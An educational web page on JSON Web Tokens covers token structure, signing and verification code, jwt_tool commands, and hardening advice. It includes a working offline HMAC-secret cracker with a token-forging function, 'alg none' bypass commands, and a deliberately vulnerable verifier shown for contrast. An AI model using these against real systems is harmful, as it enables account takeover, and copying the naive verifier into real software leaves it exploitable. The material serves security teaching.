JSON Web Tokens (JWT)
Understanding and Analyzing Web Authentication
What You'll Discover
🎯 Why This Matters
JSON Web Tokens power the login systems of millions of websites and apps you use daily. Understanding how they work - and where they can go wrong - is essential knowledge for anyone serious about cybersecurity. You'll learn to spot vulnerabilities that even experienced developers miss.
🔍 What You'll Learn
By the end of this chapter, you'll understand exactly how web authentication works behind the scenes. You'll be able to analyze any JWT token, identify security weaknesses, and know the professional techniques security experts use to test these systems.
🚀 Your First Win
Within the next 5 minutes, you'll decode your first JWT token and understand its structure. Decoding is the first step of every JWT assessment a security professional performs, and the steady stream of JWT-related entries in the CVE.org database (signature bypasses, weak secrets and algorithm-handling flaws in widely used libraries) shows why the skill matters in real-world security.
🔧 Try This Right Now
Here's the well-known sample token from the jwt.io debugger, an HS256 token signed with a test secret. Let's decode it together to see what's inside:
# Copy this token - it's the jwt.io sample token, not one from a live system
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
# JWT sections are base64url: '-' and '_' replace '+' and '/', and the '=' padding is stripped.
# Map the alphabet back and pad to a multiple of 4 before handing a section to base64 -d.
b64url_decode() { local s; s=$(printf '%s' "$1" | tr '_-' '/+'); while [ $(( ${#s} % 4 )) -ne 0 ]; do s="${s}="; done; printf '%s' "$s" | base64 -d; echo; }
# Decode the first part (the header)
b64url_decode "$(echo "$TOKEN" | cut -d'.' -f1)"
# Decode the second part (the payload)
b64url_decode "$(echo "$TOKEN" | cut -d'.' -f2)"
You'll see: The token contains readable information about a user named "John Doe" - this is how web apps know who you are when you're logged in! Notice that no key was needed: the header and payload are only base64url-encoded, never encrypted, so anyone holding a token can read them. That is why secrets and sensitive personal data must never be placed in a JWT payload.
Skills You'll Master
✅ Core Understanding
- How web authentication actually works (no more mystery!)
- Reading and understanding JWT tokens like a pro
- Spotting the difference between secure and vulnerable systems
- Using the same tools that security experts rely on
🔍 Professional Skills
- Analyzing authentication systems for weaknesses
- Testing web applications like a security consultant
- Understanding attack methods to build better defenses
- Communicating security findings clearly and professionally
Understanding JWT Structure
Think of a JWT token like a digital ID card. Just like your driver's license has different sections (photo, name, address), a JWT has three distinct parts that work together to prove who you are to a website.
Every JWT follows this pattern: header.payload.signature
Three sections separated by dots - each one has a specific job
Header: The "Type" Section
This tells the website what kind of token it's looking at and how to verify it's genuine - like the "Driver License" text on your ID.
What's Inside
- alg: the signing algorithm the token claims to use (HS256 here). This is attacker-controlled input: a verifier must decide the algorithm from its own configuration, never from this field
- typ: declares the token type, "JWT"
- kid: identifies which signing key to use (optional). Like alg it is untrusted input, so a verifier should look it up in a fixed set of known key IDs rather than use it to build a file path or query
{
"alg": "HS256",
"typ": "JWT",
"kid": "2024-key-01"
}
Payload: The "Info" Section
This contains the actual information about the user - like the name, photo, and address on your driver's license.
Types of Information
- Registered claims (defined in RFC 7519): sub (subject, the user ID), iss (issuer), exp (expiration time), iat (issued at), plus nbf, aud and jti
- Public claims: widely recognized claim names registered so that they don't collide
- Private claims: app-specific data such as user roles, agreed between the issuer and the consumer
{
"sub": "user_001",
"iss": "auth.company.com",
"exp": 1643723400,
"roles": ["analyst"]
}
Signature: The "Security" Section
This is like the holographic strip on your ID - it proves the token is authentic and hasn't been tampered with.
How It Works
- Integrity: Detects if anyone changed the data
- Authenticity: Proves it came from the right source
- Algorithm: an HMAC with a shared secret (HS256) or a digital signature with RSA (RS256) or ECDSA (ES256). These authenticate the token; none of them encrypt it
HMACSHA256(
base64UrlEncode(header) + "." +
base64UrlEncode(payload),
secret_key
)
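The formula above in working code, as an example added for this page rather than taken from it (standard library only). Token layout and HS256 follow RFC 7515/7519; the SECRET, HEADER and PAYLOAD values are constructed for a hypothetical app, and SAMPLE_TOKEN is the jwt.io token from the "Try This Right Now" section:

```python
import base64
import hashlib
import hmac
import json
from typing import Tuple

# The jwt.io sample token quoted earlier on this page
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)

# Constructed demo values for a hypothetical app (not from the page)
SECRET = b"demo-only-random-secret-at-least-32-bytes"
HEADER = {"alg": "HS256", "typ": "JWT"}
PAYLOAD = {"sub": "user_001", "iss": "auth.company.com", "exp": 1643723400, "roles": ["analyst"]}


def b64url_encode(data: bytes) -> str:
    # JWS uses base64url with the '=' padding stripped (RFC 7515)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding: the number of missing '=' is the shortfall to a multiple of 4
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    # The MAC covers the exact bytes "base64url(header).base64url(payload)"; compact JSON like real libraries
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode()) for part in (header, payload)
    )
    mac = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def decode_unverified(token: str) -> Tuple[dict, dict, bytes]:
    # Anyone holding the token can do this: header and payload are encoded, not encrypted
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def verify_hs256(token: str, secret: bytes) -> bool:
    # Recompute the MAC over the received header.payload bytes and compare in constant time
    try:
        signing_input, sig_b64 = token.rsplit(".", 1)
        expected = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
        return hmac.compare_digest(expected, b64url_decode(sig_b64))
    except ValueError:  # malformed base64, or not three dot-separated sections
        return False


def tamper(token: str, **changes) -> str:
    # Edit payload claims but keep the original signature, as an attacker without the secret must
    h, p, s = token.split(".")
    claims = json.loads(b64url_decode(p))
    claims.update(changes)
    return f"{h}.{b64url_encode(json.dumps(claims, separators=(',', ':')).encode())}.{s}"


if __name__ == "__main__":
    token = sign_hs256(HEADER, PAYLOAD, SECRET)
    print(token)
    print(decode_unverified(SAMPLE_TOKEN)[1])                    # readable with no key at all
    print(verify_hs256(token, SECRET))                           # True
    print(verify_hs256(tamper(token, roles=["admin"]), SECRET))  # False: the MAC no longer matches
```

The point to take away from verify_hs256 is that it recomputes the MAC over the bytes it received, not over re-serialized JSON, and compares with hmac.compare_digest; a byte-by-byte == comparison would leak timing information about the correct signature.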
Your Learning Path
Security professionals use a systematic approach to analyze authentication systems. Here's the proven method you'll master, broken down into clear steps:
Step 1: Manual Analysis (Start Here)
First, you'll learn to examine tokens by hand. This builds your understanding and helps you recognize patterns that automated tools might miss.
# Take any JWT token and break it apart
TOKEN="your_jwt_token_here"
# Helper: JWT sections are base64url (- and _ instead of + and /, padding stripped), so translate and re-pad before base64 -d
b64url_decode() { local s; s=$(printf '%s' "$1" | tr '_-' '/+'); while [ $(( ${#s} % 4 )) -ne 0 ]; do s="${s}="; done; printf '%s' "$s" | base64 -d; }
# Extract each section (they're separated by dots) and pretty-print the JSON
b64url_decode "$(echo "$TOKEN" | cut -d'.' -f1)" | jq .
b64url_decode "$(echo "$TOKEN" | cut -d'.' -f2)" | jq .
# Look at the signature (raw HMAC or signature bytes, so it does not decode to readable text)
echo "$TOKEN" | cut -d'.' -f3
What you'll discover: Most of the token is readable! Nothing in it is encrypted: the header and payload are plain base64url, and the signature is raw MAC or signature bytes that simply don't decode to anything meaningful. This is by design - the security comes from the signature, not from hiding the data, which is exactly why confidential data must stay out of the payload.
Step 2: Using Professional Tools
Once you understand the basics, you'll use the same web tools that security professionals rely on for quick analysis.
Pro Tip: Visit https://jwt.io/ and paste a JWT token. You'll instantly see all three sections decoded; the signature is reported as verified only once you supply the matching secret or public key. Bookmark it, with one caveat: pasting live production tokens into any third-party website is a habit to avoid, so use a local decoder such as the shell snippet above for anything real.
Step 3: Advanced Security Testing
Finally, you'll learn to use specialized security tools that can automatically test for common vulnerabilities and attack patterns.
# Get jwt_tool, a widely used JWT testing tool, and install its dependencies
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool
python3 -m pip install -r requirements.txt
# Analyze the token structure and security
python3 jwt_tool.py "$TOKEN"                     # Basic analysis and decoding
python3 jwt_tool.py "$TOKEN" -C -d wordlist.txt  # Test for weak HMAC secrets against a wordlist
python3 jwt_tool.py "$TOKEN" -X a                # Try the "alg": "none" signature-bypass attack
What this does: These commands automate checks for the most common JWT weaknesses: weak HMAC secrets, acceptance of the "none" algorithm, and (with -X k and the server's public key) RS256-to-HS256 key confusion. Treat the output as leads to confirm by hand, and only run them against systems you are authorized to test.
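What the -C -d wordlist.txt step is doing under the hood is an offline dictionary attack on the HMAC: recompute the signature with each candidate secret until one matches. The following is an added example written for this page, not jwt_tool's or hashcat's code. The six-entry WORDLIST is constructed for the demo, and the example assumes the sample token from this page was signed with jwt.io's default demo secret, "your-256-bit-secret":

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# The jwt.io sample token quoted earlier on this page
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)

# Constructed mini-wordlist; a real run streams a file such as rockyou.txt
WORDLIST = ["password", "secret", "123456", "changeme", "your-256-bit-secret", "jwt_secret"]


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate secret whose HMAC-SHA256 reproduces the token's signature.
    Entirely offline: nothing is sent to the target, so the server logs no failed attempts."""
    signing_input, sig_b64 = token.rsplit(".", 1)
    header = json.loads(b64url_decode(signing_input.split(".", 1)[0]))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token (alg={header.get('alg')!r})")
    target = b64url_decode(sig_b64)
    data = signing_input.encode("ascii")
    for word in candidates:
        # Plain == is fine here: we are the attacker, timing leaks are the defender's concern
        if hmac.new(word.encode("utf-8"), data, hashlib.sha256).digest() == target:
            return word
    return None


def forge(token: str, secret: str, **claims) -> str:
    """With the recovered secret, re-sign the token with changed claims (original header kept)."""
    h, p, _ = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(claims)
    body = f"{h}.{b64url_encode(json.dumps(payload, separators=(',', ':')).encode())}"
    mac = hmac.new(secret.encode("utf-8"), body.encode("ascii"), hashlib.sha256).digest()
    return f"{body}.{b64url_encode(mac)}"


if __name__ == "__main__":
    secret = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", secret)
    if secret:
        # Impact: the attacker can now mint any claims the application will trust
        print("forged token:", forge(SAMPLE_TOKEN, secret, name="Jane Admin", role="admin"))
```

Six candidates finish instantly; a real wordlist has millions, which is why the Hashcat entry below matters for anything beyond a quick check. The forge function is the reason a weak secret is a critical finding rather than a hygiene issue: once the secret is known, every authorization decision the application makes from the token is under the attacker's control.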
Essential Tools You'll Use
Security professionals don't memorize everything - they know which tools to use and when. Here are the essential JWT tools you should know about:
Quick Analysis Tools
JWT.io (Essential)
Instant token decoding and validation. Perfect for understanding what's inside any JWT token. Free and works in your browser.
Token.dev (Advanced)
More detailed analysis with security scoring and vulnerability detection. Great for deeper investigation.
Professional Testing Tools
JWT_Tool (Widely used)
The tool security consultants reach for to test JWT handling end to end: decoding, tampering, weak-secret cracking, "alg": "none", key confusion and JWKS spoofing checks. It automates the checks; confirming that a finding is exploitable is still your job.
Hashcat (Industry Standard)
The most widely-used password cracking tool, with a dedicated JWT mode (-m 16500) for HS256 secrets. Because it runs on the GPU, this is what security professionals actually use to test weak JWT keys against large wordlists.
💡 Pro Strategy: Start with JWT.io for every token, then use JWT_Tool when you find something interesting!
Building Secure Systems
Understanding attacks makes you better at defense. Here's what you need to know to build and recognize secure JWT implementations:
Security Essentials
- Use strong, randomly generated secrets: for HS256 at least 32 bytes from a CSPRNG, never "secret" or "password"
- Pin the expected algorithm in the verifier's configuration; a token whose alg differs fails verification
- Set short expiration times (usually 15 minutes to 1 hour) and pair them with a refresh mechanism
- Validate every claim you rely on, after the signature check: exp, nbf, iss, aud, and any role or scope claim
- Always use HTTPS - never send tokens over plain HTTP
Common Mistakes to Avoid
- Never accept the "none" algorithm (an empty signature then passes, and anyone can mint tokens)
- Don't let the token choose the algorithm: rejecting an unexpected alg also blocks RS256-to-HS256 key confusion, where the public key is used as the HMAC secret
- Use RSA/ECDSA when tokens are verified by several services, so verifiers hold only a public key; with HMAC every verifier holds the secret and could mint tokens
- Implement proper token revocation (a denylist keyed on jti, plus the ability to rotate keys), because a signed token stays valid until exp
- Monitor for unusual token patterns and failed verifications
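To make the checklist concrete, here is an added example (not the page's or any library's code) that puts a verifier which trusts the token's own alg header beside one that applies the rules above. The SECRET, ISSUER and fixed NOW clock value are constructed for the demo; a real verifier would also check aud and nbf and load the secret from a secret store:

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def mint(header: dict, payload: dict, secret: bytes) -> str:
    # Minimal signer: HS256 when asked; an empty signature for "none", exactly as an attacker would send
    signing_input = ".".join(
        b64url_encode(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload)
    )
    mac = b"" if header["alg"] == "none" else hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """VULNERABLE: lets the token pick its own algorithm and never checks any claim."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header["alg"] == "none":                     # attacker-controlled branch
        return json.loads(b64url_decode(p))
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if expected == b64url_decode(s) else None  # also not constant-time


def verify_strict(token: str, secret: bytes, issuer: str, now: Optional[int] = None) -> Optional[dict]:
    """Hardened: algorithm pinned by the verifier, constant-time MAC check, exp and iss enforced."""
    now = int(time.time()) if now is None else now
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        if header.get("alg") != "HS256":            # the server decides the algorithm, not the token
            return None
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None
        claims = json.loads(b64url_decode(p))       # only parsed after the signature is trusted
        if claims.get("iss") != issuer:
            return None
        if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
            return None
        return claims
    except (ValueError, KeyError, TypeError):       # malformed token: fail closed
        return None


# Constructed demo values (real secrets come from a CSPRNG and a secret store)
SECRET = b"demo-only-32-bytes-random-secret!"
ISSUER = "auth.company.com"
NOW = 1700000000                                    # fixed clock so the demo is reproducible
GOOD = mint({"alg": "HS256", "typ": "JWT"},
            {"sub": "user_001", "iss": ISSUER, "exp": NOW + 900, "roles": ["analyst"]}, SECRET)
# Attacker forges admin rights with alg=none and an empty signature; no secret needed
FORGED = mint({"alg": "none", "typ": "JWT"},
              {"sub": "user_001", "iss": ISSUER, "exp": NOW + 900, "roles": ["admin"]}, SECRET)
EXPIRED = mint({"alg": "HS256", "typ": "JWT"},
               {"sub": "user_001", "iss": ISSUER, "exp": NOW - 1, "roles": ["analyst"]}, SECRET)

if __name__ == "__main__":
    print("naive accepts forged  :", verify_naive(FORGED, SECRET) is not None)               # True (bad)
    print("strict accepts forged :", verify_strict(FORGED, SECRET, ISSUER, NOW) is not None)  # False
    print("strict accepts good   :", verify_strict(GOOD, SECRET, ISSUER, NOW) is not None)    # True
    print("strict accepts expired:", verify_strict(EXPIRED, SECRET, ISSUER, NOW) is not None) # False
```

Note the ordering in verify_strict: the algorithm check comes first, the signature second, and the claims are only parsed and trusted after the signature passes. Reading claims before verifying is how "none" and key-confusion tokens end up making authorization decisions.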
🎯 Your JWT Expertise is Complete!
You now understand web authentication like a security professional. You can analyze any JWT token, identify vulnerabilities, and know how to build secure systems.
Ready to Apply Your Skills to Real-World Scenarios